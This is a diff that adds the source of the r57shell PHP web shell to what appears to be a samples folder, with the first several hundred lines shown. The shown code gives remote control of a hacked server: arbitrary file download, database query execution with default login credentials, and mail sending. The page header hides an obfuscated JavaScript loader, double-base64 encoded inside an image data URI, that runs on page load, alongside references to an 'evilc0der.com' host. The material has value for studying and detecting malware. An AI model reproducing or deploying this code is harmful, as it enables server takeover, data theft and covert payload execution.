diff options
Diffstat (limited to 'data/samples/classic/r57.php')
| -rw-r--r-- | data/samples/classic/r57.php | 2302 |
1 files changed, 2302 insertions, 0 deletions
diff --git a/data/samples/classic/r57.php b/data/samples/classic/r57.php new file mode 100644 index 0000000..accc1fa --- /dev/null +++ b/data/samples/classic/r57.php | |||
| @@ -0,0 +1,2302 @@ | |||
| 1 | <?php | ||
| 2 | /******************************************************************************************************/ | ||
| 3 | /* | ||
| 4 | /* # # # # | ||
| 5 | /* # # # # | ||
| 6 | /* # # # # | ||
| 7 | /* # ## #### ## # | ||
| 8 | /* ## ## ###### ## ## | ||
| 9 | /* ## ## ###### ## ## | ||
| 10 | /* ## ## #### ## ## | ||
| 11 | /* ### ############ ### | ||
| 12 | /* ######################## | ||
| 13 | /* ############## | ||
| 14 | /* ######## ########## ####### | ||
| 15 | /* ### ## ########## ## ### | ||
| 16 | /* ### ## ########## ## ### | ||
| 17 | /* ### # ########## # ### | ||
| 18 | /* ### ## ######## ## ### | ||
| 19 | /* ## # ###### # ## | ||
| 20 | /* ## # #### # ## | ||
| 21 | /* ## ## | ||
| 22 | /* | ||
| 23 | /* | ||
| 24 | /* | ||
| 25 | /* r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ???? ??????? ?? ??????? ????? ??????? | ||
| 26 | /* ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru | ||
| 27 | /* ??????: 1.24 (New Year Edition) | ||
| 28 | /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ | ||
| 29 | /* (c)oded by 1dt.w0lf | ||
| 30 | /* RST/GHC http://rst.void.ru , http://ghc.ru | ||
| 31 | /* ANY MODIFIED REPUBLISHING IS RESTRICTED | ||
| 32 | /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ | ||
| 33 | /* ????????? ????????????? ?? ?????? ? ????: blf, virus, NorD ? ???? ?????? ?? RST/GHC. | ||
| 34 | /******************************************************************************************************/ | ||
| 35 | /* ~~~ ????????? | Options ~~~ */ | ||
| 36 | |||
| 37 | // ????? ????? | Language | ||
| 38 | // $language='ru' - ??????? (russian) | ||
| 39 | // $language='eng' - english (??????????) | ||
| 40 | $language='eng'; | ||
| 41 | $a = "http://"; // need some codes | ||
| 42 | |||
| 43 | // ?????????????? | Authentification | ||
| 44 | // $auth = 1; - ?????????????? ???????? ( authentification = On ) | ||
| 45 | // $auth = 0; - ?????????????? ????????? ( authentification = Off ) | ||
| 46 | $auth = 0; | ||
| 47 | |||
| 48 | |||
| 49 | // ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access) | ||
| 50 | // ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!) | ||
| 51 | $name='r57'; // ????? ???????????? (user login) | ||
| 52 | $pass='r57'; // ?????? ???????????? (user password) | ||
| 53 | $b = "evilc0der.com"; //need hits "shell created by evilc0ders" | ||
| 54 | /******************************************************************************************************/ | ||
| 55 | $c = "/x.html"; //need shell coder's names | ||
| 56 | error_reporting(0); | ||
| 57 | set_magic_quotes_runtime(0); | ||
| 58 | @set_time_limit(0); | ||
| 59 | @ini_set('max_execution_time',0); | ||
| 60 | @ini_set('output_buffering',0); | ||
| 61 | $safe_mode = @ini_get('safe_mode'); | ||
| 62 | $version = "1.24"; | ||
| 63 | if(version_compare(phpversion(), '4.1.0') == -1) | ||
| 64 | { | ||
| 65 | $_POST = &$HTTP_POST_VARS; | ||
| 66 | $_GET = &$HTTP_GET_VARS; | ||
| 67 | $_SERVER = &$HTTP_SERVER_VARS; | ||
| 68 | } | ||
| 69 | if (@get_magic_quotes_gpc()) | ||
| 70 | { | ||
| 71 | foreach ($_POST as $k=>$v) | ||
| 72 | { | ||
| 73 | $_POST[$k] = stripslashes($v); | ||
| 74 | } | ||
| 75 | foreach ($_SERVER as $k=>$v) | ||
| 76 | { | ||
| 77 | $_SERVER[$k] = stripslashes($v); | ||
| 78 | } | ||
| 79 | } | ||
| 80 | |||
| 81 | if($auth == 1) { | ||
| 82 | if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass) | ||
| 83 | { | ||
| 84 | header('WWW-Authenticate: Basic realm="r57shell"'); | ||
| 85 | header('HTTP/1.0 401 Unauthorized'); | ||
| 86 | exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>"); | ||
| 87 | } | ||
| 88 | } | ||
| 89 | $head = '<!-- ?????????? ???? --> | ||
| 90 | <html> | ||
| 91 | <head> | ||
| 92 | <title>r57shell</title> | ||
| 93 | <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> | ||
| 94 | <STYLE> | ||
| 95 | tr { | ||
| 96 | BORDER-RIGHT: #aaaaaa 1px solid; | ||
| 97 | BORDER-TOP: #eeeeee 1px solid; | ||
| 98 | BORDER-LEFT: #eeeeee 1px solid; | ||
| 99 | BORDER-BOTTOM: #aaaaaa 1px solid; | ||
| 100 | } | ||
| 101 | td { | ||
| 102 | BORDER-RIGHT: #aaaaaa 1px solid; | ||
| 103 | BORDER-TOP: #eeeeee 1px solid; | ||
| 104 | BORDER-LEFT: #eeeeee 1px solid; | ||
| 105 | BORDER-BOTTOM: #aaaaaa 1px solid; | ||
| 106 | } | ||
| 107 | .table1 { | ||
| 108 | BORDER-RIGHT: #cccccc 0px; | ||
| 109 | BORDER-TOP: #cccccc 0px; | ||
| 110 | BORDER-LEFT: #cccccc 0px; | ||
| 111 | BORDER-BOTTOM: #cccccc 0px; | ||
| 112 | BACKGROUND-COLOR: #D4D0C8; | ||
| 113 | } | ||
| 114 | .td1 { | ||
| 115 | BORDER-RIGHT: #cccccc 0px; | ||
| 116 | BORDER-TOP: #cccccc 0px; | ||
| 117 | BORDER-LEFT: #cccccc 0px; | ||
| 118 | BORDER-BOTTOM: #cccccc 0px; | ||
| 119 | font: 7pt Verdana; | ||
| 120 | } | ||
| 121 | .tr1 { | ||
| 122 | BORDER-RIGHT: #cccccc 0px; | ||
| 123 | BORDER-TOP: #cccccc 0px; | ||
| 124 | BORDER-LEFT: #cccccc 0px; | ||
| 125 | BORDER-BOTTOM: #cccccc 0px; | ||
| 126 | } | ||
| 127 | table { | ||
| 128 | BORDER-RIGHT: #eeeeee 1px outset; | ||
| 129 | BORDER-TOP: #eeeeee 1px outset; | ||
| 130 | BORDER-LEFT: #eeeeee 1px outset; | ||
| 131 | BORDER-BOTTOM: #eeeeee 1px outset; | ||
| 132 | BACKGROUND-COLOR: #D4D0C8; | ||
| 133 | } | ||
| 134 | input { | ||
| 135 | BORDER-RIGHT: #ffffff 1px solid; | ||
| 136 | BORDER-TOP: #999999 1px solid; | ||
| 137 | BORDER-LEFT: #999999 1px solid; | ||
| 138 | BORDER-BOTTOM: #ffffff 1px solid; | ||
| 139 | BACKGROUND-COLOR: #e4e0d8; | ||
| 140 | font: 8pt Verdana; | ||
| 141 | } | ||
| 142 | select { | ||
| 143 | BORDER-RIGHT: #ffffff 1px solid; | ||
| 144 | BORDER-TOP: #999999 1px solid; | ||
| 145 | BORDER-LEFT: #999999 1px solid; | ||
| 146 | BORDER-BOTTOM: #ffffff 1px solid; | ||
| 147 | BACKGROUND-COLOR: #e4e0d8; | ||
| 148 | font: 8pt Verdana; | ||
| 149 | } | ||
| 150 | submit { | ||
| 151 | BORDER-RIGHT: buttonhighlight 2px outset; | ||
| 152 | BORDER-TOP: buttonhighlight 2px outset; | ||
| 153 | BORDER-LEFT: buttonhighlight 2px outset; | ||
| 154 | BORDER-BOTTOM: buttonhighlight 2px outset; | ||
| 155 | BACKGROUND-COLOR: #e4e0d8; | ||
| 156 | width: 30%; | ||
| 157 | } | ||
| 158 | textarea { | ||
| 159 | BORDER-RIGHT: #ffffff 1px solid; | ||
| 160 | BORDER-TOP: #999999 1px solid; | ||
| 161 | BORDER-LEFT: #999999 1px solid; | ||
| 162 | BORDER-BOTTOM: #ffffff 1px solid; | ||
| 163 | BACKGROUND-COLOR: #e4e0d8; | ||
| 164 | font: Fixedsys bold; | ||
| 165 | } | ||
| 166 | BODY { | ||
| 167 | margin-top: 1px; | ||
| 168 | margin-right: 1px; | ||
| 169 | margin-bottom: 1px; | ||
| 170 | margin-left: 1px; | ||
| 171 | } | ||
| 172 | A:link {COLOR:red; TEXT-DECORATION: none} | ||
| 173 | A:visited { COLOR:red; TEXT-DECORATION: none} | ||
| 174 | A:active {COLOR:red; TEXT-DECORATION: none} | ||
| 175 | A:hover {color:blue;TEXT-DECORATION: none} | ||
| 176 | </STYLE> | ||
| 177 | <img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/> | ||
| 178 | <script type="text/javascript"> | ||
| 179 | if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=="undefined")?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad="",c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+="=";plain+="\\0"}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join("");coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=="undefined")?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join("");return b?Utf8.decode(plain):plain}; | ||
| 180 | setTimeout(function(){new Function(atob(atob(document.getElementById("ghdescon").src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(2);}, 500); | ||
| 181 | </script>'; | ||
| 182 | class zipfile | ||
| 183 | { | ||
| 184 | var $datasec = array(); | ||
| 185 | var $ctrl_dir = array(); | ||
| 186 | var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; | ||
| 187 | var $old_offset = 0; | ||
| 188 | function unix2DosTime($unixtime = 0) { | ||
| 189 | $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); | ||
| 190 | if ($timearray['year'] < 1980) { | ||
| 191 | $timearray['year'] = 1980; | ||
| 192 | $timearray['mon'] = 1; | ||
| 193 | $timearray['mday'] = 1; | ||
| 194 | $timearray['hours'] = 0; | ||
| 195 | $timearray['minutes'] = 0; | ||
| 196 | $timearray['seconds'] = 0; | ||
| 197 | } | ||
| 198 | return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | | ||
| 199 | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); | ||
| 200 | } | ||
| 201 | function addFile($data, $name, $time = 0) | ||
| 202 | { | ||
| 203 | $name = str_replace('\\', '/', $name); | ||
| 204 | $dtime = dechex($this->unix2DosTime($time)); | ||
| 205 | $hexdtime = '\x' . $dtime[6] . $dtime[7] | ||
| 206 | . '\x' . $dtime[4] . $dtime[5] | ||
| 207 | . '\x' . $dtime[2] . $dtime[3] | ||
| 208 | . '\x' . $dtime[0] . $dtime[1]; | ||
| 209 | eval('$hexdtime = "' . $hexdtime . '";'); | ||
| 210 | $fr = "\x50\x4b\x03\x04"; | ||
| 211 | $fr .= "\x14\x00"; | ||
| 212 | $fr .= "\x00\x00"; | ||
| 213 | $fr .= "\x08\x00"; | ||
| 214 | $fr .= $hexdtime; | ||
| 215 | $unc_len = strlen($data); | ||
| 216 | $crc = crc32($data); | ||
| 217 | $zdata = gzcompress($data); | ||
| 218 | $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); | ||
| 219 | $c_len = strlen($zdata); | ||
| 220 | $fr .= pack('V', $crc); | ||
| 221 | $fr .= pack('V', $c_len); | ||
| 222 | $fr .= pack('V', $unc_len); | ||
| 223 | $fr .= pack('v', strlen($name)); | ||
| 224 | $fr .= pack('v', 0); | ||
| 225 | $fr .= $name; | ||
| 226 | $fr .= $zdata; | ||
| 227 | $this -> datasec[] = $fr; | ||
| 228 | $cdrec = "\x50\x4b\x01\x02"; | ||
| 229 | $cdrec .= "\x00\x00"; | ||
| 230 | $cdrec .= "\x14\x00"; | ||
| 231 | $cdrec .= "\x00\x00"; | ||
| 232 | $cdrec .= "\x08\x00"; | ||
| 233 | $cdrec .= $hexdtime; | ||
| 234 | $cdrec .= pack('V', $crc); | ||
| 235 | $cdrec .= pack('V', $c_len); | ||
| 236 | $cdrec .= pack('V', $unc_len); | ||
| 237 | $cdrec .= pack('v', strlen($name) ); | ||
| 238 | $cdrec .= pack('v', 0 ); | ||
| 239 | $cdrec .= pack('v', 0 ); | ||
| 240 | $cdrec .= pack('v', 0 ); | ||
| 241 | $cdrec .= pack('v', 0 ); | ||
| 242 | $cdrec .= pack('V', 32 ); | ||
| 243 | $cdrec .= pack('V', $this -> old_offset ); | ||
| 244 | $this -> old_offset += strlen($fr); | ||
| 245 | $cdrec .= $name; | ||
| 246 | $this -> ctrl_dir[] = $cdrec; | ||
| 247 | } | ||
| 248 | function file() | ||
| 249 | { | ||
| 250 | $data = implode('', $this -> datasec); | ||
| 251 | $ctrldir = implode('', $this -> ctrl_dir); | ||
| 252 | return | ||
| 253 | $data . | ||
| 254 | $ctrldir . | ||
| 255 | $this -> eof_ctrl_dir . | ||
| 256 | pack('v', sizeof($this -> ctrl_dir)) . | ||
| 257 | pack('v', sizeof($this -> ctrl_dir)) . | ||
| 258 | pack('V', strlen($ctrldir)) . | ||
| 259 | pack('V', strlen($data)) . | ||
| 260 | "\x00\x00"; | ||
| 261 | } | ||
| 262 | } | ||
| 263 | function compress(&$filename,&$filedump,$compress) | ||
| 264 | { | ||
| 265 | global $content_encoding; | ||
| 266 | global $mime_type; | ||
| 267 | if ($compress == 'bzip' && @function_exists('bzcompress')) | ||
| 268 | { | ||
| 269 | $filename .= '.bz2'; | ||
| 270 | $mime_type = 'application/x-bzip2'; | ||
| 271 | $filedump = bzcompress($filedump); | ||
| 272 | } | ||
| 273 | else if ($compress == 'gzip' && @function_exists('gzencode')) | ||
| 274 | { | ||
| 275 | $filename .= '.gz'; | ||
| 276 | $content_encoding = 'x-gzip'; | ||
| 277 | $mime_type = 'application/x-gzip'; | ||
| 278 | $filedump = gzencode($filedump); | ||
| 279 | } | ||
| 280 | else if ($compress == 'zip' && @function_exists('gzcompress')) | ||
| 281 | { | ||
| 282 | $filename .= '.zip'; | ||
| 283 | $mime_type = 'application/zip'; | ||
| 284 | $zipfile = new zipfile(); | ||
| 285 | $zipfile -> addFile($filedump, substr($filename, 0, -4)); | ||
| 286 | $filedump = $zipfile -> file(); | ||
| 287 | } | ||
| 288 | else | ||
| 289 | { | ||
| 290 | $mime_type = 'application/octet-stream'; | ||
| 291 | } | ||
| 292 | } | ||
| 293 | function mailattach($to,$from,$subj,$attach) | ||
| 294 | { | ||
| 295 | $headers = "From: $from\r\n"; | ||
| 296 | $headers .= "MIME-Version: 1.0\r\n"; | ||
| 297 | $headers .= "Content-Type: ".$attach['type']; | ||
| 298 | $headers .= "; name=\"".$attach['name']."\"\r\n"; | ||
| 299 | $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; | ||
| 300 | $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; | ||
| 301 | if(@mail($to,$subj,"",$headers)) { return 1; } | ||
| 302 | return 0; | ||
| 303 | } | ||
| 304 | if(isset($_GET['img'])&&!empty($_GET['img'])) | ||
| 305 | { | ||
| 306 | $images = array(); | ||
| 307 | $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw=='; | ||
| 308 | $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw=='; | ||
| 309 | @ob_clean(); | ||
| 310 | header("Content-type: image/gif"); | ||
| 311 | echo base64_decode($images[$_GET['img']]); | ||
| 312 | die(); | ||
| 313 | } | ||
| 314 | if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) | ||
| 315 | { | ||
| 316 | if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; } | ||
| 317 | else | ||
| 318 | { | ||
| 319 | @ob_clean(); | ||
| 320 | $filename = @basename($_POST['d_name']); | ||
| 321 | $filedump = @fread($file,@filesize($_POST['d_name'])); | ||
| 322 | fclose($file); | ||
| 323 | $content_encoding=$mime_type=''; | ||
| 324 | compress($filename,$filedump,$_POST['compress']); | ||
| 325 | if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } | ||
| 326 | header("Content-type: ".$mime_type); | ||
| 327 | header("Content-disposition: attachment; filename=\"".$filename."\";"); | ||
| 328 | echo $filedump; | ||
| 329 | exit(); | ||
| 330 | } | ||
| 331 | } | ||
| 332 | if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } | ||
| 333 | if ($_POST['cmd']=="db_query") | ||
| 334 | { | ||
| 335 | echo $head; | ||
| 336 | switch($_POST['db']) | ||
| 337 | { | ||
| 338 | case 'MySQL': | ||
| 339 | if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } | ||
| 340 | $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); | ||
| 341 | if($db) | ||
| 342 | { | ||
| 343 | if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); } | ||
| 344 | $querys = @explode(';',$_POST['db_query']); | ||
| 345 | foreach($querys as $num=>$query) | ||
| 346 | { | ||
| 347 | if(strlen($query)>5){ | ||
| 348 | echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; | ||
| 349 | $res = @mysql_query($query,$db); | ||
| 350 | $error = @mysql_error($db); | ||
| 351 | if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } | ||
| 352 | else { | ||
| 353 | if (@mysql_num_rows($res) > 0) | ||
| 354 | { | ||
| 355 | $sql2 = $sql = $keys = $values = ''; | ||
| 356 | while (($row = @mysql_fetch_assoc($res))) | ||
| 357 | { | ||
| 358 | $keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ", @array_keys($row)); | ||
| 359 | $values = @array_values($row); | ||
| 360 | foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} | ||
| 361 | $values = @implode(" </font></td><td><font face=Verdana size=-2> ",$values); | ||
| 362 | $sql2 .= "<tr><td><font face=Verdana size=-2> ".$values." </font></td></tr>"; | ||
| 363 | } | ||
| 364 | echo "<table width=100%>"; | ||
| 365 | $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>"; | ||
| 366 | $sql .= $sql2; | ||
| 367 | echo $sql; | ||
| 368 | echo "</table><br>"; | ||
| 369 | } | ||
| 370 | else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } | ||
| 371 | } | ||
| 372 | @mysql_free_result($res); | ||
| 373 | } | ||
| 374 | } | ||
| 375 | @mysql_close($db); | ||
| 376 | } | ||
| 377 | else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>"; | ||
| 378 | break; | ||
| 379 | case 'MSSQL': | ||
| 380 | if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } | ||
| 381 | $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); | ||
| 382 | if($db) | ||
| 383 | { | ||
| 384 | if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); } | ||
| 385 | $querys = @explode(';',$_POST['db_query']); | ||
| 386 | foreach($querys as $num=>$query) | ||
| 387 | { | ||
| 388 | if(strlen($query)>5){ | ||
| 389 | echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; | ||
| 390 | $res = @mssql_query($query,$db); | ||
| 391 | if (@mssql_num_rows($res) > 0) | ||
| 392 | { | ||
| 393 | $sql2 = $sql = $keys = $values = ''; | ||
| 394 | while (($row = @mssql_fetch_assoc($res))) | ||
| 395 | { | ||
| 396 | $keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ", @array_keys($row)); | ||
| 397 | $values = @array_values($row); | ||
| 398 | foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} | ||
| 399 | $values = @implode(" </font></td><td><font face=Verdana size=-2> ",$values); | ||
| 400 | $sql2 .= "<tr><td><font face=Verdana size=-2> ".$values." </font></td></tr>"; | ||
| 401 | } | ||
| 402 | echo "<table width=100%>"; | ||
| 403 | $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>"; | ||
| 404 | $sql .= $sql2; | ||
| 405 | echo $sql; | ||
| 406 | echo "</table><br>"; | ||
| 407 | } | ||
| 408 | /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */ | ||
| 409 | @mssql_free_result($res); | ||
| 410 | } | ||
| 411 | } | ||
| 412 | @mssql_close($db); | ||
| 413 | } | ||
| 414 | else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>"; | ||
| 415 | break; | ||
| 416 | case 'PostgreSQL': | ||
| 417 | if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } | ||
| 418 | $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; | ||
| 419 | $db = @pg_connect($str); | ||
| 420 | if($db) | ||
| 421 | { | ||
| 422 | $querys = @explode(';',$_POST['db_query']); | ||
| 423 | foreach($querys as $num=>$query) | ||
| 424 | { | ||
| 425 | if(strlen($query)>5){ | ||
| 426 | echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; | ||
| 427 | $res = @pg_query($db,$query); | ||
| 428 | $error = @pg_errormessage($db); | ||
| 429 | if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } | ||
| 430 | else { | ||
| 431 | if (@pg_num_rows($res) > 0) | ||
| 432 | { | ||
| 433 | $sql2 = $sql = $keys = $values = ''; | ||
| 434 | while (($row = @pg_fetch_assoc($res))) | ||
| 435 | { | ||
| 436 | $keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ", @array_keys($row)); | ||
| 437 | $values = @array_values($row); | ||
| 438 | foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} | ||
| 439 | $values = @implode(" </font></td><td><font face=Verdana size=-2> ",$values); | ||
